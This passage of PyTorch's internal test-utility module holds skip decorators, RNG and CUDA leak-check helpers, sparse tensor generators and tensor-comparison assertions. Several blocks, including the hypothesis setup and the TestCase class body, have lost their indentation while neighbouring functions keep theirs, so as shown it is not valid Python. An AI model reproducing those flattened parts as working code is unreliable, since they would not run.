    """Skip the test when SciPy is not installed."""
    @wraps(fn)
    def scipy_guard(*args, **kwargs):
        if not TEST_SCIPY:
            raise unittest.SkipTest("test require SciPy, but SciPy not found")
        fn(*args, **kwargs)
    return scipy_guard
def skipIfOnGHA(fn):
    """Skip the test when running under GitHub Actions."""
    @wraps(fn)
    def gha_guard(*args, **kwargs):
        if ON_GHA:
            raise unittest.SkipTest("Test disabled for GHA")
        fn(*args, **kwargs)
    return gha_guard
def skipIfTBB(message="This test makes TBB sad"):
    """Decorator factory: skip the test on TBB-enabled PyTorch builds."""
    def dec_fn(fn):
        @wraps(fn)
        def tbb_guard(*args, **kwargs):
            if IS_TBB:
                raise unittest.SkipTest(message)
            fn(*args, **kwargs)
        return tbb_guard
    return dec_fn
def slowTest(fn):
    """Mark a test as slow: skipped unless PYTORCH_TEST_WITH_SLOW=1, and
    tagged with `slow_test` so tooling can recognize it."""
    @wraps(fn)
    def slow_guard(*args, **kwargs):
        if not TEST_WITH_SLOW:
            raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
        fn(*args, **kwargs)
    slow_guard.slow_test = True
    return slow_guard
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
    """Mark *fn* as a noarch test; skipped when TEST_SKIP_NOARCH is set.

    Noarch tests exercise no platform-specific code, so one CI configuration
    running them is enough (see gh-53743).
    """
    @wraps(fn)
    def wrapper(*args, **kwargs):
        if not TEST_SKIP_NOARCH:
            fn(*args, **kwargs)
        else:
            raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
    return wrapper
def slowAwareTest(fn):
    """Tag *fn* with the ``slow_test`` marker without wrapping it."""
    setattr(fn, 'slow_test', True)
    return fn
def skipCUDAMemoryLeakCheckIf(condition):
    """Decorator factory: disable the CUDA memory-leak check when *condition* holds."""
    def dec(fn):
        # Only flip the flag while it is still (implicitly) enabled; an
        # explicit earlier opt-out is never re-enabled.
        currently_enabled = getattr(fn, '_do_cuda_memory_leak_check', True)
        if currently_enabled:
            fn._do_cuda_memory_leak_check = not condition
        return fn
    return dec
def skipCUDANonDefaultStreamIf(condition):
    """Decorator factory: disable non-default-stream enforcement when *condition* holds."""
    def dec(fn):
        # Only flip the flag while it is still (implicitly) enabled.
        currently_enabled = getattr(fn, '_do_cuda_non_default_stream', True)
        if currently_enabled:
            fn._do_cuda_non_default_stream = not condition
        return fn
    return dec
def suppress_warnings(fn):
    """Decorator: run *fn* with all Python warnings suppressed.

    Returns ``fn``'s result — the original wrapper silently discarded it,
    which made the decorator unusable on value-returning helpers.
    """
    @wraps(fn)
    def wrapper(*args, **kwargs):
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            return fn(*args, **kwargs)
    return wrapper
def to_gpu(obj, type_map=None):
    """Return a CUDA copy of *obj* (tensor/storage/list/tuple recursively),
    deep-copying anything else.  *type_map* optionally remaps tensor dtypes."""
    if type_map is None:
        type_map = {}
    if isinstance(obj, torch.Tensor):
        assert obj.is_leaf
        target_dtype = type_map.get(obj.dtype, obj.dtype)
        with torch.no_grad():
            moved = obj.clone().to(dtype=target_dtype, device="cuda")
        moved.requires_grad = obj.requires_grad
        return moved
    if torch.is_storage(obj):
        return obj.new().resize_(obj.size()).copy_(obj)
    if isinstance(obj, list):
        return [to_gpu(item, type_map) for item in obj]
    if isinstance(obj, tuple):
        return tuple(to_gpu(item, type_map) for item in obj)
    return deepcopy(obj)
def get_function_arglist(func):
    """Return the list of positional argument names of *func*."""
    spec = inspect.getfullargspec(func)
    return spec.args
def set_rng_seed(seed):
    """Seed torch, Python's ``random``, and (when available) NumPy."""
    torch.manual_seed(seed)
    random.seed(seed)
    if TEST_NUMPY:
        np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
    """Context manager that restores the torch (and CUDA) RNG state on exit.

    The original implementation restored state only on a clean exit; an
    exception in the body left the RNG perturbed.  Wrapping the ``yield`` in
    try/finally guarantees restoration on every path.
    """
    rng_state = torch.get_rng_state()
    if torch.cuda.is_available():
        cuda_rng_state = torch.cuda.get_rng_state()
    try:
        yield
    finally:
        if torch.cuda.is_available():
            torch.cuda.set_rng_state(cuda_rng_state)
        torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
    """Temporarily set torch's default dtype, restoring the prior one on exit."""
    previous = torch.get_default_dtype()
    torch.set_default_dtype(dtype)
    try:
        yield
    finally:
        torch.set_default_dtype(previous)
def iter_indices(tensor):
    """Iterate all indices of *tensor*: empty for 0-d, plain ints for 1-d,
    index tuples otherwise."""
    dim = tensor.dim()
    if dim == 0:
        return range(0)
    if dim == 1:
        return range(tensor.size(0))
    return product(*(range(extent) for extent in tensor.size()))
def is_iterable(obj):
    """Return True when ``iter(obj)`` succeeds, False on TypeError."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True
def is_iterable_of_tensors(iterable, include_empty=False):
    """Return True iff *iterable* is a sized iterable containing only tensors.

    An empty iterable yields :attr:`include_empty`; a bare tensor (which is
    itself iterable) and anything without ``len()`` yield False.
    """
    # A tensor is itself iterable, so rule it out up front.
    if isinstance(iterable, torch.Tensor):
        return False
    try:
        if len(iterable) == 0:
            return include_empty
        return all(isinstance(elem, torch.Tensor) for elem in iterable)
    except TypeError:
        return False
class CudaNonDefaultStream():
    """Context manager that moves every CUDA device onto a fresh non-default
    stream for the duration of a test, restoring the prior streams on exit."""
    def __enter__(self):
        # Remember the stream active on each CUDA device, then switch each
        # device to a newly created stream so tests cannot accidentally rely
        # on the default stream.
        prior_device = torch.cuda.current_device()
        self.beforeStreams = []
        for dev in range(torch.cuda.device_count()):
            self.beforeStreams.append(torch.cuda.current_stream(dev))
            torch._C._cuda_setStream(torch.cuda.Stream(device=dev)._cdata)
        torch._C._cuda_setDevice(prior_device)
    def __exit__(self, exec_type, exec_value, traceback):
        # Restore the streams recorded in __enter__ on every CUDA device.
        prior_device = torch.cuda.current_device()
        for dev in range(torch.cuda.device_count()):
            torch._C._cuda_setStream(self.beforeStreams[dev]._cdata)
        torch._C._cuda_setDevice(prior_device)
class CudaMemoryLeakCheck():
    """Context manager asserting that a test leaks no CUDA memory.

    On ROCm a mismatch only warns (transient memory can be misreported as
    leaked — see #62533); on CUDA it fails the owning testcase.
    """
    def __init__(self, testcase, name=None):
        self.name = testcase.id() if name is None else name
        self.testcase = testcase
        # Initialize the CUDA context and RNG up front so their allocations
        # are not mistaken for leaks of the first test checked.
        from torch.testing._internal.common_cuda import initialize_cuda_context_rng
        initialize_cuda_context_rng()
    @staticmethod
    def get_cuda_memory_usage():
        # No torch.cuda.synchronize() needed: allocator statistics are
        # updated when a block is marked free, not at actual freeing time.
        gc.collect()
        return tuple(torch.cuda.memory_allocated(dev)
                     for dev in range(torch.cuda.device_count()))
    def __enter__(self):
        self.befores = self.get_cuda_memory_usage()
    def __exit__(self, exec_type, exec_value, traceback):
        # If the test body raised, skip the leak check entirely.
        if exec_type is not None:
            return
        afters = self.get_cuda_memory_usage()
        for i, (before, after) in enumerate(zip(self.befores, afters)):
            if TEST_WITH_ROCM:
                # See #62533
                # ROCM: Sometimes the transient memory is reported as leaked memory
                if before != after:
                    warnings.warn('{} leaked {} bytes ROCm memory on device {}'.format(
                        self.name, after - before, i), RuntimeWarning)
            else:
                self.testcase.assertEqual(
                    before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
                        self.name, after - before, i))
@contextmanager
def skip_exception_type(exc_type):
    """Convert an *exc_type* raised inside the block into unittest.SkipTest."""
    try:
        yield
    except exc_type as e:
        raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
    """Gate *test* against the slow-test and disabled-test configuration.

    Raises:
        unittest.SkipTest: when the test is marked slow (and slow tests are
            off), is disabled for the current platform, or is fast while
            PYTORCH_TEST_SKIP_FAST is set.
    """
    test_suite = str(test.__class__).split('\'')[1]
    test_name = f'{test._testMethodName} ({test_suite})'
    if slow_tests_dict is not None and test_name in slow_tests_dict:
        getattr(test, test._testMethodName).__dict__['slow_test'] = True
        if not TEST_WITH_SLOW:
            raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
    if not IS_SANDCASTLE and disabled_tests_dict is not None:
        if test_name in disabled_tests_dict:
            issue_url, platforms = disabled_tests_dict[test_name]
            platform_to_conditional: Dict = {
                "mac": IS_MACOS,
                "macos": IS_MACOS,
                "win": IS_WINDOWS,
                "windows": IS_WINDOWS,
                "linux": IS_LINUX,
                "rocm": TEST_WITH_ROCM,
                "asan": TEST_WITH_ASAN
            }
            # An empty platform list means "disabled everywhere".
            if platforms == [] or any(platform_to_conditional[platform] for platform in platforms):
                raise unittest.SkipTest(
                    f"Test is disabled because an issue exists disabling it: {issue_url}" +
                    # BUGFIX: original said "for allplatform(s)" — the space
                    # after 'all' was missing.
                    f" for {'all ' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
                    "If you're seeing this on your local machine and would like to enable this test, " +
                    "please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
    if TEST_SKIP_FAST:
        if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
            raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
    """Return the dtype to compare tensors *a* and *b* in.

    bfloat16 is remapped to float32 (no comparison support), and float16 is
    widened to float32 unless both tensors live on the same CUDA device.
    """
    # TODO: update this when promote_types supports bfloat16 and/or
    # isclose supports bfloat16.
    def widen(t):
        return torch.float32 if t.dtype is torch.bfloat16 else t.dtype
    compare_dtype = torch.promote_types(widen(a), widen(b))
    # non-CUDA (CPU, for example) float16 -> float32
    # TODO: update this when isclose is implemented for CPU float16
    if compare_dtype is torch.float16 and (
            a.device != b.device or a.device.type != 'cuda' or b.device.type != 'cuda'):
        compare_dtype = torch.float32
    return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
    """Variant of unittest's private _AssertRaisesContext that skips (rather
    than fails) the test when the raised exception is NotImplementedError."""
    def __exit__(self, exc_type, exc_value, tb):
        is_not_implemented = exc_type is not None and issubclass(exc_type, NotImplementedError)
        if is_not_implemented:
            # skipTest raises unittest.SkipTest, aborting the context.
            self.test_case.skipTest(f"not_implemented: {exc_value}")  # type: ignore[attr-defined]
        return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
    """Temporarily toggle torch's warn_always flag, restoring it on exit."""
    previous = torch.is_warn_always_enabled()
    torch.set_warn_always(new_val)
    try:
        yield
    finally:
        torch.set_warn_always(previous)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
    @property
    def precision(self) -> float:
        """Minimum atol floor applied when comparing tensors (adjusted by
        @precisionOverride / @toleranceOverride)."""
        return self._precision
    @precision.setter
    def precision(self, prec: float) -> None:
        """Set the minimum atol floor."""
        self._precision = prec
    @property
    def rel_tol(self) -> float:
        """Minimum rtol floor applied when comparing tensors (adjusted by
        @toleranceOverride)."""
        return self._rel_tol
    @rel_tol.setter
    def rel_tol(self, prec: float) -> None:
        """Set the minimum rtol floor."""
        self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
    def wrap_method_with_policy(self, method, policy):
        """Return *method* wrapped so each invocation runs inside a context
        manager freshly produced by ``policy()``.

        *policy* is a zero-argument callable returning a context manager; it
        is called anew on every invocation.  Assumes *method* is the tested
        function bound to ``self``.
        """
        # NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
        # alive, so this cannot be done in setUp and tearDown because
        # tearDown is run unconditionally no matter whether the test
        # passes or not. For the same reason, we can't wrap the `method`
        # call in try-finally and always do the check.
        @wraps(method)
        def wrapper(self, *args, **kwargs):
            with policy():
                method(*args, **kwargs)
        return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
    def run(self, result=None):
        """Run the test, then halt the whole suite on unrecoverable failure."""
        super().run(result=result)
        # Early terminate test if necessary.
        # NOTE(review): if ``result`` is None this call would raise
        # AttributeError; presumably the runner always supplies a result
        # object -- confirm before relying on the default.
        if self._should_stop_test_suite():
            result.stop()
    def setUp(self):
        """Per-test setup: apply skip/slow-test gating, then reseed all RNGs."""
        check_if_enable(self)
        set_rng_seed(SEED)
    @staticmethod
    def _make_crow_indices(n_rows, n_cols, nnz,
                           *, device, dtype, random=True):
        """Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
        the number of specified elements nnz.
        If random is True, the column counts of rows are in random
        order. Otherwise, the column counts of rows are defined by the
        used sampling method.
        Sampling method
        ---------------
        The used sampling method was introduced in
        https://pearu.github.io/csr_sampling.html, and here we give
        only an overall description of the method.
        Notice that crow_indices can be defined as cumsum(counts)
        where counts is a sequence of non-negative integers satisfying
        the following conditions:
          len(counts) == n_rows + 1
          counts.max() <= n_cols
        while counts[i + 1] is interpreted as the number of specified
        elements in the i-th row.
        The used sampling method aims at increasing the diversity of
        CSR samples, that is, a CSR sample should contain (i) rows
        that are all filled, (ii) rows with no elements at all, and
        (iii) rows that are partially filled. At the same time and for
        the given total number of specified elements (nnz), there
        should be minimal preference to rows with a given number of
        elements. To achieve this, the sampling method is built-up on
        using a sawteeth model for counts. In the simplest case, we
        would have
          counts = arange(n_rows + 1) % (n_cols + 1)
        that has equal number of all possible column counts per row.
        This formula can be used only for specific input values of
        n_rows, n_cols, and nnz. To generalize this model to any
        combinations of inputs, the counts model above is extended
        with an incomplete sawtooth, and the right and lower
        rectangular parts that will guarantee that
          counts.sum() == nnz
        for any combination of n_rows, n_cols, and nnz. Basically,
        we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
        that is able to hold a sequence of sawteeth and so-called
        final correction, while the external part of the window is
        filled with counts to meet the nnz constraint exactly.
        """
        assert 0 <= nnz <= n_rows * n_cols
        def sawteeth(n, m):
            # return the total number of counts in the sequence of
            # sawteeth where n and m define a window in (n_rows+1,
            # n_cols+1) rectangle where the sequence of sawteeth
            # perfectly fit.
            M = (n_cols - m) * (n_cols - m + 1) // 2
            K = (n_rows - n) % (n_cols - m + 1)
            return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
        # Different from the original method description, here counts
        # has leading 0 required by crow_indices:
        counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
        n = m = 0
        N = sawteeth(n, m)
        if N and nnz >= max(N, n_cols):
            # determine the width of the sawteeth window. We use bisection to solve
            #   N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
            # for n
            n_left = n
            n_right = n_rows - 1
            N_right = sawteeth(n_right, m)
            while n_right - n_left > 1:
                n_middle = (n_left + n_right) // 2
                N_middle = sawteeth(n_middle, m)
                if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
                    n_right, N_right = n_middle, N_middle
                else:
                    n_left = n_middle
            n, N = n_right, N_right
            # fill the right rectangle with counts:
            assert n
            counts[-n:].fill_(n_cols)
        if N and nnz - n * n_cols >= max(N, n_rows - n):
            # determine the height of the sawteeth window. We use bisection to solve
            #   N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
            # for m.
            m_left = m
            m_right = n_cols - 1
            N_right = sawteeth(n, m_right)
            while m_right - m_left > 1:
                m_middle = (m_left + m_right) // 2
                N_middle = sawteeth(n, m_middle)
                if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
                    m_right, N_right = m_middle, N_middle
                else:
                    m_left = m_middle
            m, N = m_right, N_right
            # fill the bottom rectangle with counts:
            assert m
            counts[1:n_rows - n + 1].fill_(m)
        if N:
            # fill the sawteeth window with counts
            q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
                          (n_cols - m) * (n_cols - m + 1) // 2)
            p = 1 + q * (n_cols - m + 1)
            if sys.version_info >= (3, 8):
                k = math.isqrt(2 * r)
            else:
                # math.isqrt(x) is available starting from Python 3.8.
                # Here we use int(math.sqrt(x)) as an approximation
                # that appears to give exact result for all x values
                # less than 2**35, at least, the upper limit of x is
                # TBD.
                k = int(math.sqrt(2 * r))
            # largest k with k*(k+1)/2 <= r (floor(sqrt(2r)) can overshoot):
            if k * (k + 1) > 2 * r:
                k -= 1
            corr = r - k * (k + 1) // 2
            assert not ((p > 1) and (m > 0))  # full sawteeth are never on top of a bottom rectangle
            # sequence of full sawteeth:
            counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
            # incomplete sawtooth:
            counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
        else:
            # given input does not support sawteeth
            p = 1
            corr = nnz - n * n_cols - m * (n_rows - n)
        # correction that will guarantee counts.sum() == nnz:
        counts[p] += corr
        if random:
            # randomize crow_indices by shuffling the sawteeth
            # sequence:
            perm = torch.randperm(n_rows, device=counts.device)
            counts[1:] = counts[1:][perm]
        # compute crow_indices:
        crow_indices = counts
        crow_indices.cumsum_(dim=0)
        return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
